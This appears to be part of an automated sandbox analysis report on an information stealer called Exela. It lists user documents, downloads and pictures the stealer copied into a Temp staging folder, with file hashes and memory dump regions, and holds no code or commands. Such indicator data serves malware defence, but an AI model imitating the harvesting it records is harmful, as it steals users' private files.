C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\CopyExit.docx

MD5 9ef95f18f4237ae3627873c1af515dce
SHA1 301c19c4d6fed8e26b7aef35ad487dcf9f99db9f
SHA256 9c36bd898edabf37a9c7f8704766ebba20cebd467997570d20ca0533e6efe498
SHA512 08a9f42db39b4e82059d3b1607169ab2eba8b26fdc6fe9f8fb5616cf9959eec593bfa02440fb9418beba44dbfaee7d5cb146ae79cb554f8a1e8a2bfe2c998703

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\UnpublishHide.xlsx

MD5 9cf06055c381a9887b903f056fd0ceb9
SHA1 71a277fea1b44a6f86998441e9d597512ddd624f
SHA256 9f426c4499fac85a655d763aafa93074807618c30d472017ee0eb875ca5d8598
SHA512 ec6b851bb3b0357bc5ce0fba62fa531817ae30e715741530c2764f41a2e172ed8aa4fe9a43d2dacb92861c18443c43dc3770647051e9228b44e260bfb5b52eac

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\BackupComplete.pcx

MD5 636fd29af966784f63357616af708e2e
SHA1 645c293d2019bdc240d48f76ffd3518340745dcd
SHA256 591586f19b9bdf4eedde4c7e2786d546a3a309d043b5703628f26ca9d93731c2
SHA512 6e64fe48267007de467d3ea5ea40f0fabb0951303ca5e42823bd069d01956a63cd9171ce1e24b7f30f4b9d0275905ad2eaa7204f0be099785cf9006d1b22b74c

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\InvokeCopy.docx

MD5 0b5e256e33dc7fbe48da3dfc4edb7719
SHA1 c529590ea2f5356520833ed8c219f2f41e8e2eac
SHA256 37408ef649eb854093f989149b86fe10ad9cc26ca65ab72c49ca2d95c3083c1f
SHA512 fe0165d2386bc2e45396a0018a1f740838a4fa1dedf996f84f16362739f6f555d6b777aa429c5a2c112846bc289243b395b9c64b7aef912a4fe8b134cd5512af

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\CopyRestart.docx

MD5 582711d6aff5c8ebf78cd08107be6d19
SHA1 5693e99b0b128e250d234017f5d425cfb0580630
SHA256 53e2727b6728dd87920abd2bd51512557400b498d8cbe474a4ac3e854189fad2
SHA512 71558cda0f06eb85513ce937346c0a32b7b3a33d28116ec86f1ae1d299d880735b9c64a8c01a9585e22609eaa84eb6a95dcd2b421cf0366508d908f3e418bcfe

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\ConfirmEnter.mp4

MD5 653f144c68c0ec3cf8de7f7d69d1c5ef
SHA1 91a9f317e5bd589ba578f5cd37767485830a1fd0
SHA256 c305ff80bc73be29a29cc57066761ff875ba7545bacd52b72235a980a2660f87
SHA512 923eeb2917c7ddbb56dbbf62f23382850e894829ab41e30431b4bb8c2593425e5ba14644fc197d5602b38188edec0d7391d88ae86467c113c92288f8ddb076cc

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\InvokeMount.mp3

MD5 1b82725e121e010f37c077e4db1cacdf
SHA1 097c8b5a06955d2bca108df9f14ab37d86894971
SHA256 72b5f93b97201242c1a3300a698300cb3846422b6beba8be07aac50cc3bffe95
SHA512 9e04e9570e6305a53f93a971379a8a186f62eb696525a1d595edfa9e837009f560cef8f8e55af1dd0d80f2b493926cebce02ecf57966d1531778d0f27ffeaf96

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\RedoBackup.potm

MD5 3fa21e0128196ba25f4fb2e157a6ba87
SHA1 2ed42e33026d4f9713f5d7ad9494d8f4b5824593
SHA256 a1caddc3c2f8b765fb10e5330a53dd7780a04bdb6c5e4d67e4dc825360b1752f
SHA512 c88d1eb7d9fb7afdba27ff9736bd2105a34d95dbc1f2003a99999279a987f81f47629e87a24459879899f7962f678d3d5773364162f86c6969f2924411fe8f39

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\ResetBackup.aif

MD5 011f618ee209d39a6645187dff177523
SHA1 504de5b8196054d7c36fb045edeb932053eb8215
SHA256 1f3b8bd8b3b9ca71237ed4bad37a52a0f9222a5813e94a2e755df7a690a7031f
SHA512 bd7e44cf3e04d30beea54b65f42afc9565b633773f5bdb7c789eccd7dddad1b7966a63984569c012567b69a93015fe110718a4d8ddb6837771f732b9618ce713

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Music\StepSet.xls

MD5 7c9e7c987632cd268425c969583ff0cf
SHA1 f4b78d28acd9670203bf75f6c6bcfb3168059ceb
SHA256 fc3d7052e7935b53f5508dd68eb1069d76a34b5933b929650a9ea416c11ffe01
SHA512 88a14b80e1f8b6f05b336bfa984a327839de09ae28fc5dab11fe43fc0dd785e8a27f68bb5c4cd171667c42ed1109c8a736d14bc71191fec3291daf6eee70c3da

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\UnblockWatch.jpg

MD5 522866e2d8ab6ce974365e74361357a8
SHA1 e7de98e6a7bbc498c6a8010d4e6ef36d8dd6d91c
SHA256 1b4d7df6b3c43dd2682da4ade72c08d044cf2a991b762bf6cbc3329448645061
SHA512 6950cf5f6ac331db22eb833d755374c7d1f3feb9a30eaed964038983cc64a200091721b53d54606e1790e442404e4e7ab5df41a0b7abc1f30a342a5259269693

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Music\SuspendEnable.jpeg

MD5 34e6f2afeef2c14521bae8ae1943989b
SHA1 0a9e5d759a045fd1efd6136e56933bc478ea2623
SHA256 acb7d128deba8b0c3c66db0080d59ac493fe3be11ab08fd303f9a5ceafa7f48c
SHA512 96fddb9501b7a671d713fd55fc17fc79034f51738938cda1a8f2e068366a120bc4d9983587fa0b2be8101eed8ea3e6b979fd82da2b1db56c6e24c7956d5850b7

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\SelectBackup.jpg

MD5 c730bf6c670a1678ca763549f7d935f8
SHA1 9d74aeed6d629927774f28f423211d1482880786
SHA256 8fd99d7e18c93293fbba28683eab10af65160adfacaf6102f638113aaf028ab8
SHA512 c763255f1b205776a938e8fdbf00961622df7b2ac81d4f933261b0e606926f6c7fb3a1cf18507e8c6979854e828e07fe1bc4a3426d96dee1afbf4b8f7cf8b8b8

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\BackupConfirm.svg

MD5 869c653cd3eef5099ef0d97a9b389c19
SHA1 062edc1ce904c0f5201641c9935cc882e07febf1
SHA256 1535efff9a720d33f7a6094e91094ae097df86012014c574947a94f1175f0975
SHA512 fdc328c303d0038fa10174d8ab5db972a557a4605cb0dd32a2ab6b689bef808258e267c4fea7b171875a06de1a5cf62f795a4c160f2e99fc2c0a63b69055a4dd

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\CompressBackup.svgz

MD5 42eab3863b3230ae28f14f792d8ab88f
SHA1 5488d5b61f735b5381da589f13dfd544c7d89809
SHA256 93b7d6b102bc73976ac9927590d71e3cab6785d8c10895a8b0be6a9773f4c024
SHA512 6ba941da622915fb4ad5d4a59a03aaf4d33f2c6f4f7458cebd59197ecb62d337e6e3daa64ffc31bcd317cc13ccf989e9a3d34ada9c110a4c7fd113fd81c6b468

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\LimitResume.jpeg

MD5 f712403c7203e4b7b38e85dc4be48ae8
SHA1 a96c2f6d82f9b6e9c1258c5e191d277ef83672cb
SHA256 eb9d536d051caa2d1cd2461394e59bf50791a4b9f331620e74e0a3b9ab42ec87
SHA512 aae48c25a76e1bba428c59f8e4f99a27b60411ceb6dc8f06605a37fac0d0b3fd3cf18c475b31d46e0cb8ad3cf90e7ffc611b8d6fe553160c0252c556459e041c

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\SwitchDisable.png

MD5 1d97c3a649f755b244dacbfc1304e90d
SHA1 25b989d7ac4517ecd1f631a38029bc0d68016031
SHA256 d622154adebe21bdef6fca89dab16256bfff07ec3c7d6309a439340f6c22309a
SHA512 5515c76c28f142a2481f68b6b48e14d2a8d27aff826508af26bcf74986821186310a15076261af727c4cd5af6d82a1ce0e2bace4746c8ab95068206df80c207a

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\SelectRestore.jpg

MD5 6692ec1f743f1bfab5bacf55f820891b
SHA1 727c5500a3e46aac8c8c67b989e97793c58fe5bf
SHA256 e489e11ec456b599221dfe27e26a605899be417ddbf1a3a219b7dcc86d99b68d
SHA512 46fe566ab28316278a39a2f1d01ca07ba66adf54941fb709a7f081c18c5a4b84d4703dde08ea1834cbaaefaf2da374df9216c0780b43f1d397f721107a8d1435

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\RevokeInitialize.jpeg

MD5 507b62beafbbaf245877f7e0bd962a86
SHA1 29fb4b573b6a90c72d0e7064c752393ae04dd606
SHA256 fd074bee2e62c291b6f895c419f54c56d91940cd95d3aece66b3be01ece10317
SHA512 589ac86a8094170764ab6f0b2620198f55e46b8019c2311df031970116c110c3f1c3c4279df2026e69487cc6591f1283e47e72484bfc89d376f14c60cc688a08

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\PushPing.png

MD5 98f33b268d1a2664293f054a7514b50a
SHA1 33ab78c0776e71966e60aa8608b77b4a78e771bd
SHA256 6ca27af7c0c4a49a5c585f2ffcd5ac7bd43cc1533e495383250f7e85017b432d
SHA512 9e22f37137dc1607cdbd42bd646234257a33e886be95dd8c25f38f6886377a81386777bff508d3c99976dba3256ea4c8a544968ba83908484e6e758de7cb4a26

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\My Wallpaper.jpg

MD5 a51464e41d75b2aa2b00ca31ea2ce7eb
SHA1 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d
SHA256 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
SHA512 b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

memory/952-609-0x00007FFF227A0000-0x00007FFF22D88000-memory.dmp

memory/952-629-0x00007FFF35340000-0x00007FFF35386000-memory.dmp

memory/952-628-0x00007FFF39700000-0x00007FFF39718000-memory.dmp

memory/952-621-0x00007FFF3D4F0000-0x00007FFF3D505000-memory.dmp

memory/952-618-0x00007FFF35070000-0x00007FFF3509E000-memory.dmp

memory/952-655-0x00007FFF227A0000-0x00007FFF22D88000-memory.dmp

memory/952-674-0x00007FFF39700000-0x00007FFF39718000-memory.dmp

memory/952-667-0x00007FFF3D4F0000-0x00007FFF3D505000-memory.dmp

memory/952-683-0x00007FFF227A0000-0x00007FFF22D88000-memory.dmp

memory/952-770-0x00007FFF3D3D0000-0x00007FFF3D3DF000-memory.dmp

memory/952-773-0x00007FFF39B90000-0x00007FFF39B9D000-memory.dmp

memory/952-779-0x00007FFF355A0000-0x00007FFF356BC000-memory.dmp

memory/952-778-0x00007FFF39BE0000-0x00007FFF39BF9000-memory.dmp

memory/952-777-0x00007FFF3D4F0000-0x00007FFF3D505000-memory.dmp

memory/952-776-0x00007FFF21E40000-0x00007FFF21EF8000-memory.dmp

memory/952-775-0x00007FFF3D3F0000-0x00007FFF3D402000-memory.dmp

memory/952-774-0x00007FFF3A990000-0x00007FFF3A9A4000-memory.dmp

memory/952-772-0x00007FFF3A880000-0x00007FFF3A8AD000-memory.dmp

memory/952-771-0x00007FFF3A8B0000-0x00007FFF3A8C9000-memory.dmp

memory/952-765-0x00007FFF21590000-0x00007FFF21E31000-memory.dmp

memory/952-764-0x00007FFF2FC00000-0x00007FFF2FC18000-memory.dmp

memory/952-763-0x00007FFF3A980000-0x00007FFF3A98A000-memory.dmp

memory/952-762-0x00007FFF2FC20000-0x00007FFF2FC4D000-memory.dmp

memory/952-761-0x00007FFF38FE0000-0x00007FFF38FF1000-memory.dmp

memory/952-760-0x00007FFF35340000-0x00007FFF35386000-memory.dmp

memory/952-759-0x00007FFF39700000-0x00007FFF39718000-memory.dmp

memory/952-754-0x00007FFF3A9B0000-0x00007FFF3A9CC000-memory.dmp

memory/952-750-0x00007FFF21F00000-0x00007FFF22275000-memory.dmp

memory/952-749-0x00007FFF35070000-0x00007FFF3509E000-memory.dmp

memory/952-748-0x00007FFF22280000-0x00007FFF223F3000-memory.dmp

memory/952-747-0x00007FFF350A0000-0x00007FFF350C3000-memory.dmp

memory/952-740-0x00007FFF227A0000-0x00007FFF22D88000-memory.dmp

memory/952-769-0x00007FFF3A930000-0x00007FFF3A954000-memory.dmp

memory/952-768-0x00007FFF3A850000-0x00007FFF3A869000-memory.dmp

memory/952-767-0x00007FFF3D630000-0x00007FFF3D63D000-memory.dmp

memory/952-766-0x00007FFF2EC80000-0x00007FFF2ECB7000-memory.dmp

memory/952-757-0x00007FFF39C00000-0x00007FFF39C1E000-memory.dmp